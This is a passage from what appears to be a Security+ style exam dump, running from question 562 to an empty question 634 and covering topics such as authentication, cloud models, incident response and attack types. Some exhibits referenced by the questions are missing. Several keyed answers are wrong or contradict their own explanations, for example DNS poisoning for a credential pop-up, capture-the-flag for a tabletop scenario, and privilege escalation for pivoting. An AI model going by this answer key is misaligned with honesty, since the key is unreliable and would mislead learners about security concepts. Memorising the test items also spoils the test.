Victim. Victims can be identified by their names, email addresses, or network identifiers.

END
QUESTION 562
During an investigation, the incident response team discovers that multiple administrator accounts were suspected of being compromised. The host audit logs indicate a repeated brute-force attack on a single administrator account followed by suspicious logins from unfamiliar geographic locations. Which of the following data sources would be BEST to use to assess the accounts impacted by this attack?

A. User behavior analytics 
B. Dump files
C. Bandwidth monitors
D. Protocol analyzer output

Answer: A 

User behavior analytics is a cybersecurity process about detection of insider threats, targeted attacks, and financial fraud that tracks a system's users. UBA looks at patterns of human behavior, and then analyzes them to detect anomalies that indicate potential threats.

END
QUESTION 563
A network engineer at a company with a web server is building a new web environment with the following requirements:

- Only one web server at a time can service requests.
- If the primary web server fails, a failover needs to occur to ensure the secondary web server becomes the primary.

Which of the following load-balancing options BEST fits the requirements?

A. Cookie-based 
B. Active-passive 
C. Persistence 
D. Round robin

Answer: B

END
QUESTION 564
A user's login credentials were recently compromised. During the investigation, the security analyst determined the user input their credentials into a pop-up window when prompted to confirm the username and password. However, the trusted website does not use a pop-up for entering user credentials. Which of the following attacks occurred?

A. Cross-site scripting 
B. SQL injection
C. DNS poisoning 
D. Certificate forgery

Answer: C

END
QUESTION 565
A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account. 
Which of the following does this action describe?

A. Insider threat
B. Social engineering 
C. Third-party risk
D. Data breach

Answer: A

END
QUESTION 566
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the Internet. The penetration tester stops the test to inform the client of the findings.
Which of the following should be the client's NEXT step to mitigate the issue?

A. Conduct a full vulnerability scan to identify possible vulnerabilities. 
B. Perform containment on the critical servers and resources
C. Review the firewall and identify the source of the active connection. 
D. Disconnect the entire infrastructure from the Internet

Answer: B

END
QUESTION 567
Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?

A. Common Weakness Enumeration 
B. OSINT
C. Dark web
D. Vulnerability databases

Answer: C

The Common Weakness Enumeration (CWE) is a category system for hardware and software weaknesses and vulnerabilities. It is sustained by a community project with the goals of understanding flaws in software and hardware and creating automated tools that can be used to identify, fix, and prevent those flaws. The project is sponsored by the National Cybersecurity FFRDC, which is operated by The MITRE Corporation, with support from US-CERT and the National Cyber Security Division of the U.S. Department of Homeland Security. 

END
QUESTION 568
Which of the following types of attacks is being attempted and how can it be mitigated?
 

A. XSS; implement a SIEM 
B. CSRF; implement an IPS
C. Directory traversal: implement a WAF 
D. SQL injection: implement an IDS

Answer: C

END
QUESTION 569
Which of the following control types is focused primarily on reducing risk before an incident occurs?

A. Preventive 
B. Deterrent 
C. Corrective 
D. Detective

Answer: A

END
QUESTION 570
Per company security policy, IT staff members are required to have separate credentials to perform administrative functions using just-in-time permissions.
Which of the following solutions is the company Implementing?

A. Privileged access management 
B. SSO
C. RADIUS
D. Attribute-based access control

Answer: A

END
QUESTION 571
A company is planning to install a guest wireless network so visitors will be able to access the Internet. 
The stakeholders want the network to be easy to connect to, so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

A. Configure the guest wireless network to be on a separate VLAN from the company's internal wireless network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network. 
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.

Answer: A

END
QUESTION 572
Which of the following will increase cryptographic security?

A. High data entropy
B. Algorithms that require less computing power 
C. Longer key longevity
D. Hashing

Answer: A

Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a message in a human language or programming language or data structure. The plaintext must be ordered for it to be intelligible to a person, computer processor, or database. One of the requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high level of entropy. If any elements of order from the plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be shown to be weak.

END
QUESTION 573
Which of the following components can be used to consolidate and forward inbound Internet traffic to multiple cloud environments though a single firewall?

A. Transit gateway 
B. Cloud hot site 
C. Edge computing 
D. DNS sinkhole

Answer: A

Traditionally, Virtual Private Clouds (VPCs) can be interconnected using peering relationships and connected with on-premises networks using VPN gateways. These one-to-one VPC peering relationships can quickly become difficult to manage, especially if each VPC must interconnect in a mesh-like structure. A transit gateway is a simpler means of managing these interconnections. Essentially, a transit gateway is a virtual router that handles routing between the subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transit-gateway).

END
QUESTION 574
A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will MOST likely be used to identify when the breach occurred through each device?

A. SIEM correlation dashboards 
B. Firewall syslog event logs
C. Network management solution login audit logs 
D. Bandwidth monitors and interface sensors

Answer: A

END
QUESTION 575
The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?

A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors 
C. Creating a unique PSK for every visitor when they arrive at the reception area 
D. Deploying a captive portal to capture visitors' MAC addresses and names

Answer: D

END
QUESTION 576
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. 
A combined effort from both organizations' SOC teams would speed up the effort. 
Which of the following can be written to document this agreement?

A. MOU 
B. ISA 
C. SLA 
D. NDA

Answer: A

END
QUESTION 577
Which of the following employee roles is responsible for protecting an organization's collected personal information?

A. CTO 
B. DPO 
C. CEO 
D. DBA

Answer: B 

Explanation:
Many companies also have a data protection officer or DPO. This is a higher-level manager who is responsible for the organization's overall data privacy policies.

END
QUESTION 578
A malware attack has corrupted 30TB of company data across all file servers. A systems administrator Identifies the malware and contains the issue, but the data is unrecoverable. The administrator is not concerned about the data loss because the company has a system in place that will allow users to access the data that was backed up last night. Which of the following resiliency techniques did the administrator MOST likely use to prevent impacts to business operations after an attack?

A. Tape backups 
B. Replication
C. RAID
D. Cloud storage

Answer: D

END
QUESTION 579
A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack at Layer 7? (Select TWO).

A. HIDS 
B. NIPS 
C. HSM 
D. WAF 
E. NAC 
F. NIDS
G. Stateless firewall

Answer: BD

END
QUESTION 580
An organization is moving away from the use of client-side and server-side certificates for EAP. 
The company would like for the new EAP solution to have the ability to detect rogue access points. 
Which of the following would accomplish these requirements?

A. PEAP
B. EAP-FAST 
C. EAP-TLS 
D. EAP-TTLS

Answer: B

END
QUESTION 581
An amusement park is implementing a biometric system that validates customers' fingerprints to ensure they are not sharing tickets. The park's owner values customers above all and would prefer customers' convenience over security. For this reason, which of the following features should the security team prioritize FIRST?

A. Low FAR 
B. Low efficacy
C. Low FRR 
D. Low CER

Answer: C

Efficacy - capacity for producing a desired result or effect.


END
QUESTION 582
A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a baseline deviation is detected, a user challenge will be triggered. 
Which of the following should be configured to deploy the proposal?

A. Context-aware authentication
B. Simultaneous authentication of equals 
C. Extensive authentication protocol
D. Agentless network access control

Answer: A

With a location-based, context-aware challenge-response authentication, a challenge may be provided to a user. The challenge may be based on a context corresponding to the user. The context corresponding to the user may comprise a location of a device associated with the user within an environment. Next, in response to providing the challenge, a response to the challenge may be received from the user. Then, in response to receiving the response to the challenge, it may be determined that the response is a correct answer to the challenge. In response to determining the response is the correct answer, a privilege may be provided to the user.

END
QUESTION 583
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. 
The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the BEST remediation for this data leak?

A. User training 
B. CASB
C. MDM 
D. DLP

Answer: D

END
QUESTION 584
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations. Which of the following would be the BEST solution to Implement?

A. DLP
B. USB data blocker 
C. USB OTG
D. Disabling USB ports

Answer: B

Some Android USB ports support USB On The Go (OTG) and there are adapters for iOS devices. USB OTG allows a port to function either as a host or as a device. For example, a port on a smartphone might operate as a device when connected to a
PC, but as a host when connected to a keyboard or external hard drive. The extra pin communicates which mode the port is in.

END
QUESTION 585
An organization is planning to open other datacenters to sustain operations in the event of a natural disaster. Which of the following considerations would BEST support the organization's resiliency?

A. Geographic dispersal 
B. Generator power
C. Fire suppression
D. Facility automation

Answer: A

END
QUESTION 586
A security analyst has been asked by the Chief Information Security Officer to:

- develop a secure method of providing centralized management of infrastructure
- reduce the need to constantly replace aging end user machines 
- provide a consistent user desktop experience

Which of the following BEST meets these requirements?

A. BYOD
B. Mobile device management 
C. VDI
D. Containerization

Answer: C

END
QUESTION 587
Historically. a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result, the threat of malware incidents is almost constant. Which of the following would BEST help prevent the malware from being installed on the computers?

A. AUP 
B. NGFW 
C. DLP 
D. EDR

Answer: D

An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state. Endpoints are computing devices such as servers, desktops, laptops, mobile devices, or Internet of Things (IoT) devices. Endpoint detection and response (EDR), sometimes called endpoint threat detection and response (ETDR), provides continuous monitoring of endpoints. EDR tools are part of a defense-in-depth strategy. EDR tools perform a deep investigation 
of all activity on endpoints.

END
QUESTION 588
During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server. Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain a presence in the network. In which of the following stages of the Cyber Kill Chain is the adversary currently operating?

A. Reconnaissance
B. Command and control 
C. Actions on objective 
D. Exploitation

Answer: B

The Lockheed Martin kill chain identifies the following phases:

1. Reconnaissance—in this stage the attacker determines what methods to use to complete the phases of the attack 
and gathers information about the target's personnel, computer systems, and supply chain.

2. Weaponization—the attacker couples payload code that will enable access with exploit code that will use a vulnerability to execute on the target system.

3. Delivery—the attacker identifies a vector by which to transmit the weaponized code to the target environment, such as via an email attachment or on a USB drive.

4. Exploitation—the weaponized code is executed on the target system by this mechanism. For example, a phishing email may trick the user into running the code, while a drive-by-download would execute on a vulnerable system without user intervention.

5. Installation—this mechanism enables the weaponized code to run a remote access tool and achieve persistence on the target system.

6. Command and control (C2 or C&C)—the weaponized code establishes an outbound channel to a remote server that can 
then be used to control the remote access tool and possibly download additional tools to progress the attack. 

7. Actions on objectives—in this phase, the attacker typically uses the access he has achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however.

END
QUESTION 589
A security analyst has been tasked with creating a new WiFi network for the company. 
The requirements received by the analyst are as follows:

- Must be able to differentiate between users connected to WiFi
- The encryption keys need to change routinely without interrupting the users or forcing reauthentication
- Must be able to integrate with RADIUS 
- Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise 
B. WPA3-PSK
C. 802.11n 
D. WPS

Answer: A

END
QUESTION 590
An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:

- Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.
- Internal users in question were changing their passwords frequently during that time period. 
- A jump box that several domain administrators use to connect to remote devices was recently compromised.
- The authentication method used in the environment is NTLM.

Which of the following types of attacks is MOST likely being used to gain unauthorized access?

A. Pass-the-hash 
B. Brute-force
C. Directory traversal 
D. Replay

Answer: A

In a pass the hash attack, the attacker discovers the hash of the user’s password and then uses it to log on to the system as the user. Any authentication protocol that passes the hash over the network in an unencrypted format is susceptible to this attack. It has been widely associated with Microsoft LAN Manager (LM) and NT LAN Manager (NTLM), two older security protocols used to authenticate Microsoft clients. However, this attack has enjoyed success against other protocols, such as Kerberos.

END
QUESTION 591
A systems administrator is troubleshooting a server's connection to an internal web server. 
The administrator needs to determine the correct ports to use. 
Which of the following tools BEST shows which ports on the web server are in a listening state?

A. Ipconfig 
B. ssh
C. Ping 
D. Netstat

Answer: D

END
QUESTION 592
Which of the following describes the continuous delivery software development methodology?

A. Waterfall 
B. Spiral
C. V-shaped 
D. Agile

Answer: D

Most organizations use Agile methodologies, involving a development process of continuous integration, delivery, and deployment. You will need to be able to support the creation and use of secure development and staging environments, 
plus the use of provisioning and deprovisioning tools.

END
QUESTION 593
An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?

A. On-path attack
B. Protocol poisoning 
C. Domain hijacking 
D. Bluejacking

Answer: A

Attackers can also take advantage of the lack of security in low-level data link protocols to perform man-in-the-middle (MitM) attacks. A MitM or on-path attack is where the threat actor gains a position between two hosts, and transparently captures,
monitors, and relays all communication between the hosts. An on-path attack could also be used to covertly modify the traffic.

END
QUESTION 594
A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?

A. Red-team exercise
B. Capture-the-flag exercise 
C. Tabletop exercise
D. Phishing exercise

Answer: B

Capture the Flag (CTF) is usually used in ethical hacker training programs and gamified competitions. Participants must complete a series of challenges within a virtualized computing environment to discover a flag. The flag will represent either
threat actor activity (for blue team exercises) or a vulnerability (for red team exercises) and the participant must use analysis 
and appropriate tools to discover it.

END
QUESTION 595
A company is looking to migrate some servers to the cloud to minimize its technology footprint. 
The company has 100 databases that are on premises. 
Which of the following solutions will require the LEAST management and support from the company?

A. SaaS 
B. IaaS 
C. PaaS 
D. SDN

Answer: A

Software as a service (SaaS) is a different model of provisioning software applications. Rather than purchasing software licenses for a given number of seats, a business would access software hosted on a supplier's servers on a pay-as-you go or lease arrangement (on-demand). Virtual infrastructure allows developers to provision on-demand applications much more quickly than previously. The applications can be developed and tested in the cloud without the need to test and deploy on client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite. google.com).

Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS. A typical PaaS solution would provide servers and storage network infrastructure (as per IaaS) but also provide a multi-tier web application/database platform on top.
This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples include Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.microsoft.com/services/sql-database), and Google App Engine (cloud.google.com/ appengine). As distinct from SaaS though, this platform would not be configured to actually do anything. 
Your own developers would have to create the software (the CRM or e‑commerce application) that runs using the platform. 
The service provider would be responsible for the integrity and availability of the platform components, but you would be responsible for the security of the application you created on the platform.

END
QUESTION 596
All security analyst’s workstations at a company have network access to a critical server VLAN. The information security manager wants to further enhance the controls by requiring that all access to the secure VLAN be authorized only from a given single location. Which of the following will the information security manager MOST likely implement?

A. A forward proxy server 
B. A jump server
C. A reverse proxy server 
D. A stateful firewall server

Answer: B

One of the challenges of managing hosts that are exposed to the Internet, such as in a DMZ or cloud virtual network, is to provide administrative access to the servers and appliances located within it. On the one hand, a link is necessary; on the other, the
administrative interface could be compromised and exploited as a pivot point into the rest of the network. Consequently, the management hosts permitted to access administrative interfaces on hosts in the secure zone must be tightly controlled.
Configuring and auditing this type of control when there are many different servers operating in the zone is complex
.
One solution to this complexity is to add a single administration server, or jump server, to the secure zone. The jump server only runs the necessary administrative port and protocol (typically SSH or RDP). Administrators connect to the jump server then use the jump server to connect to the admin interface on the application server. The application server's admin interface has a single entry in its ACL (the jump server) and denies connection attempts from any other hosts.

END
QUESTION 597
A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the users is increasing. Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in properties. Which of the following security controls can be implemented?

A. Enforce MFA when an account request reaches a risk threshold. 
B. implement geofencing to only allow access from headquarters 
C. Enforce time-based login requests to align with business hours 
D. Shift the access control scheme to a discretionary access control

Answer: A

END
QUESTION 598
Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

A. Implement proper network access restrictions 
B. Initiate a bug bounty program
C. Classify the system as shadow IT.
D. Increase the frequency of vulnerability scans

Answer: A

END
QUESTION 599
An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the following should the organization use to compare biometric solutions?

A. FRR
B. Difficulty of use 
C. Cost
D. FAR 
E. CER

Answer: D

END
QUESTION 600 
Which of the following environments minimizes end user disruption and is MOST likely to be used to assess the impacts of any database migrations or major system changes by using the final version of the code in an operationally representative environment?

A. Staging 
B. Test
C. Production 
D. Development

Answer: A

END
QUESTION 601
An organization wants to participate in threat intelligence information sharing with peer groups. 
Which of the following would MOST likely meet the organizations requirement?

A. Perform OSINT investigations
B. Subscribe to threat intelligence feeds 
C. Submit RFCs
D. Implement a TAXII server

Answer: D

Trusted Automated eXchange of Indicator Information (TAXII). TAXII is an open standard that defines a set of services and message exchanges used to share information. It provides a standard way for organizations to exchange cyber threat information, but it does not specify what information organizations should exchange. Structured Threat Information eXpression (STIX). STIX is an open standard that identifies what cyber threat information organizations should share. 
It provides a common language for addressing a wide range of cyber threat information. STIX data is shared via TAXII.

END
QUESTION 602
A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users' interaction. The SIEM have multiple login entries with the following text:







Which of the following is the MOST likely attack conducted on the environment?

A. Malicious script
B. Privilege escalation 
C. Domain hijacking 
D. DNS poisoning

Answer: A

END
QUESTION 603
A company is receiving emails with links to phishing sites that look very similar to the company's own website address and content. Which of the following is the BEST way for the company to mitigate this attack?

A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing. 
B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each. 
C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.
D. Use an automated tool to flood the phishing websites with fake usernames and passwords.

Answer: B

END
QUESTION 604
As part of a security compliance assessment, an auditor performs automated vulnerability scans. 
In addition, which of the following should the auditor do to complete the assessment?

A. User behavior analysis 
B. Packet captures
C. Configuration reviews 
D. Log analysis

Answer: C

END
QUESTION 605
After multiple on premises security solutions were migrated to the cloud, the incident response time increased. 
The analyst is spending a long time to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

A. CASB 
B. VPC 
C. SWG 
D. CMS

Answer: A

A configuration management system (CMS) is the tools and databases that collect, store, manage, update, and present information about CIs (Configuration Items) and their relationships. A small network might capture this information in 
spreadsheets and diagrams; there are dedicated applications for enterprise CMS.

END
QUESTION 606
Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?

A. Check to see if the third party has resources to create dedicated development and staging environments.
B. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository.
C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries' developers.
D. Read multiple penetration-testing reports for environments running software that reused the library.

Answer: C

Third-party library—using a binary package (such as a dynamic link library) that implements some sort of standard functionality, such as establishing a network connection or performing cryptography. Each library must be monitored for vulnerabilities and patched promptly.

The use of off-the shelf packages such as WordPress, Moodle, or Joomla! can lead to in easily exploitable website if the relevant
security bulletins and configuration advisories are not followed. The Magecart syndicate is a good example 
(trustwave.com/en-us/resources/blogs/spiderlabs-blog/anyone-can-check-formagecart-with-justthe-browser).

END
QUESTION 607
Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

- All users share workstations throughout the day.
- Endpoint protection was disabled on several workstations throughout the network.
- Travel times on logins from the affected users are impossible. 
- Sensitive data is being uploaded to external sites.
- All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

A. Brute-force 
B. Keylogger 
C. Dictionary 
D. Rainbow

Answer: B

END
QUESTION 608
Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?

A. To avoid data leakage
B. To protect surveillance logs 
C. To ensure availability
D. To restrict remote access

Answer: D

END
QUESTION 609
An application developer accidentally uploaded a company's code-signing certificate private key to a public web server. The company is concerned about malicious use of its certificate.
Which of the following should the company do FIRST?

A. Delete the private key from the repository. 
B. Verify the public key is not exposed as well.
C. Update the DLP solution to check for private keys. 
D. Revoke the code-signing certificate.

Answer: D

END
QUESTION 610
A security analyst is investigating some users who are being redirected to a fake website that resembles www.Domain.com. The following output was found on the naming server of the organization:









Which of the following attacks has taken place?

A. Domain reputation 
B. Domain hijacking 
C. Disassociation
D. DNS poisoning

Answer: D

END
QUESTION 611
The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the following incident response processes is the CISO requesting?

A. Lessons learned 
B. Preparation
C. Detection
D. Containment
E. Root cause analysis

Answer: A

END
QUESTION 612
While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method.
Which of the following would BEST detect a malicious actor?

A. Utilizing SIEM correlation engines
B. Deploying Netflow at the network border 
C. Disabling session tokens for all sites
D. Deploying a WAF for the web server

Answer: D

A web application firewall (WAF) is designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks. WAFs use application-aware processing rules to filter traffic and perform application specific intrusion detection. The WAF can be programmed with signatures of known attacks and use pattern matching to block requests containing suspect code. The output from a WAF will be written to a log, which you can inspect to determine what threats the web application might be subject to.

END
QUESTION 613
An administrator is experiencing issues when trying to upload a support file to a vendor. 
A pop-up message reveals that a payment card number was found in the file, and the file upload was blocked.
Which of the following controls is most likely causing this issue and should be checked FIRST?

A. DLP
B. Firewall rule 
C. Content filter 
D. MDM
E. Application whitelist

Answer: A

END
QUESTION 614
After returning from a conference, a user's laptop has been operating slower than normal and overheating, and the fans have been running constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop's motherboard. Which of the following attack vectors was exploited to install the hardware?

A. Removable media 
B. Spear phishing
C. Supply chain 
D. Direct access

Answer: D

END
QUESTION 615
Which of the following policies establishes rules to measure third-party work tasks and ensure deliverables are provided within a specific time-line?

A. SLA 
B. MOU 
C. AUP 
D. NDA

Answer: A

END
QUESTION 616
A customer has reported that an organization's website displayed an image of a smiley face rather than the expected web page for a short time two days earlier.
A security analyst reviews log files and sees the following around the time of the incident:








Which of the following is MOST likely occurring?

A. Invalid trust chain 
B. Domain hijacking 
C. DNS poisoning 
D. URL redirection

Answer: D

MitB attack (Man-in-the-Browser attack) An attack when the web browser is compromised by installing malicious
plug-ins or scripts, or intercepting API calls between the browser process and DLLs.

END
QUESTION 617
Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

A. Page files 
B. Event logs 
C. RAM
D. Cache
E. Stored files 
F. HDD

Answer: CD

END
QUESTION 618
A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory contents. Which of the following backup types should be used?

A. Snapshot 
B. Differential 
C. Cloud
D. Full
E. Incremental

Answer: A

END
QUESTION 619
A security manager needs to assess the security posture of one of the organization's vendors. 
The contract with the vendor does not allow for auditing of the vendor's security controls. 
Which of the following should the manager request to complete the assessment?

A. A service-level agreement
B. A business partnership agreement 
C. A SOC 2 Type 2 report
D. A memorandum of understanding

Answer: C

The Statements on Standards for Attestation Engagements (SSAE) are audit specifications developed by the American Institute of Certified Public Accountants (AICPA). These audits are designed to assure consumers that service providers, notably cloud providers, but including any type of hosted or third-party service meet professional standards.
 (aicpa.org/interestareas/frc/assuranceadvisoryservices/ serviceorganization-smanagement.html) 

Within SSAE No. 18 (the current specification), there are several levels of reporting:

1.	Service Organization Control (SOC2)— evaluates the internal controls implemented by the service provider to ensure compliance with Trust Services Criteria (TSC) when storing and processing customer data. TSC refers to security, confidentiality, integrity, availability, and privacy properties. An SOC2 Type I report assesses the system design, while a Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted. They should only be shared with the auditor and regulators and with important partners under non- disclosure agreement (NDA) terms.

END
QUESTION 620
A security monitoring company offers a service that alerts its customers if their credit cards have been stolen. 
Which of the following is the MOST likely source of this information?

A. STIX
B. The dark web 
C. TAXII
D. Social media
E. PCI

Answer: B

Another primary source of threat intelligence is the dark web. The deep web is any part of the World Wide Web that is not indexed by a search engine. This includes pages that require registration, pages that block search indexing, unlinked pages, pages using non-standard DNS, and content encoded in a non-standard manner. Within the deep web, are areas that are deliberately concealed from "regular" browser access.

> Dark net—a network established as an overlay to Internet infrastructure by software, such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize usage and prevent a third party from knowing about the existence of the network or analyzing any activity taking place over the network. Onion routing, for instance, uses multiple layers of encryption and relays between nodes to achieve this anonymity.

> Dark web—sites, content, and services accessible only over a dark net. While there are dark web search engines, many sites are hidden from them. Access to a dark web site via its URL is often only available via "word of mouth" bulletin boards.
Investigating these dark web sites and message boards is a valuable source of counterintelligence. The anonymity of dark web services has made it easy for investigators to infiltrate the forums and webstores that have been set up to exchange stolen data and hacking tools. As adversaries react to this, they are setting up new networks and ways of identifying law enforcement infiltration. Consequently, dark nets and the dark web represent a continually shifting landscape.

END
QUESTION 621
Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.

Answer: D 

Explanation:
A non-credentialed scan will monitor the network and see any vulnerabilities that an attacker would easily find; we should fix the vulnerabilities found with a non-credentialed scan first, as this is what the hacker will see when they enter your network. For example, an administrator runs a non- credentialed scan on the network and finds that there are three missing patches. The scan does not provide many details on these missing patches. The administrator installs the missing patches to keep the systems up to date as they can only operate on the information produced for them.

END
QUESTION 622
Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business accounts. Which of the following would mitigate the issue?

A. Complexity requirements 
B. Password history
C. Acceptable use policy 
D. Shared accounts

Answer: B

END
QUESTION 623
After gaining access to a dual-homed (i.e.. wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a penetration tester then gains shell access on another networked asset. This technique is an example of:

A. privilege escalation 
B. footprinting
C. persistence 
D. pivoting.

Answer: A

Privilege escalation then enabled the attacker to pivot to another network asset.

END
QUESTION 624
An organization has hired a red team to simulate attacks on its security posture. 
Which of the following will the blue team do after detecting an loC?

A. Reimage the impacted workstations.
B. Activate runbooks for incident response
C. Conduct forensics on the compromised system
D. Conduct passive reconnaissance to gather information

Answer: B

END
QUESTION 625
A security analyst was called to investigate a file received directly from a hardware manufacturer. 
The analyst is trying to determine whether the file was modified in transit before installation on the user's computer. Which of the following can be used to safely assess the file?

A. Check the hash of the installation file. 
B. Match the file names.
C. Verify the URL download location. 
D. Verify the code-signing certificate.

Answer: A

END
QUESTION 626
After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?

A. SSH
B. SNMPv3 
C. SFTP
D. Telnet 
E. FTP

Answer: A

END
QUESTION 627
A security administrator has discovered that workstations on the LAN are becoming infected with malware. The cause of the infections appears to be users receiving phishing emails that are bypassing the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs, as no internal controls currently exist in the environment to evaluate their safety. Which of the following would be BEST to implement to address the issue?

A. Forward proxy 
B. HIDS
C. Awareness training 
D. A jump server
E. IPS

Answer: C

END
QUESTION 628
Which of the following are common VoIP-associated vulnerabilities? (Select TWO).

A. SPIM 
B. Vishing
C. Hopping 
D. Phishing
E. Credential harvesting 
F. Tailgating

Answer: BC

Vishing—a phishing attack conducted through a voice channel (telephone or VoIP, for instance). For example, targets could be called by someone purporting to represent their bank asking them to verify a recent credit card transaction and requesting their security details. It can be much more difficult for someone to refuse a request made in a phone call compared to one made in an email.

VLAN hopping is a type of network attack where an attacker who is connected to an access port (which is attached to a particular VLAN) can gain access to network traffic from other VLANs.
Normally, a computer attached to a switch access port (which is attached to a particular VLAN) can get traffic only from the VLAN related with that switch port.
Using VLAN hopping attack, an attacker can sniff network traffic from another VLAN using a sniffer (protocol analyzer) or send traffic from one VLAN to another VLAN.

Tailgating is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. Piggybacking is a similar situation, but means that the attacker enters a secure area with an
employee's permission.

END
QUESTION 629
A customer service representative reported an unusual text message that was sent to the help desk. 
The message contained an unrecognized invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?

A. Vishing 
B. Whaling 
C. Phishing 
D. Smishing

Answer: D

END
QUESTION 630
A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the analyst do NEXT?

A. Review how the malware was introduced to the network.
B. Attempt to quarantine all infected hosts to limit further spread. 
C. Create help desk tickets to get infected systems reimaged.
D. Update all endpoint antivirus solutions with the latest updates.

Answer: B

END
QUESTION 631
Which of the following would detect intrusions at the perimeter of an airport?

A. Signage 
B. Fencing
C. Motion sensors 
D. Lighting
E. Bollards

Answer: B 

Fiber optic cable is designed to detect and pinpoint the location of intrusion anywhere on the airport perimeter fence, providing real-time reporting of intrusion

https://www.airport-technology.com/contractors/access/fft/pressreleases/press19-13/
 
Fiber optics - An ideal perimeter protection solution for airport perimeters is a fence-mounted fiber optic detection system, linking back to the main security center and ideally interfacing to CCTV cameras to provide visual confirmation to staff.

END
QUESTION 632
A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing resources and block internal HR applications from reaching the cloud. 
Which of the following cloud models is being used?

A. Public
B. Community 
C. Hybrid
D. Private

Answer: C

END
QUESTION 633
Developers are about to release a financial application, but the number of fields on the forms that could be abused by an attacker is troubling. Which of the following techniques should be used to address this vulnerability?

A. Implement input validation
B. Encrypt data before submission 
C. Perform a manual review
D. Conduct a peer review session

Answer: A

END
QUESTION 634
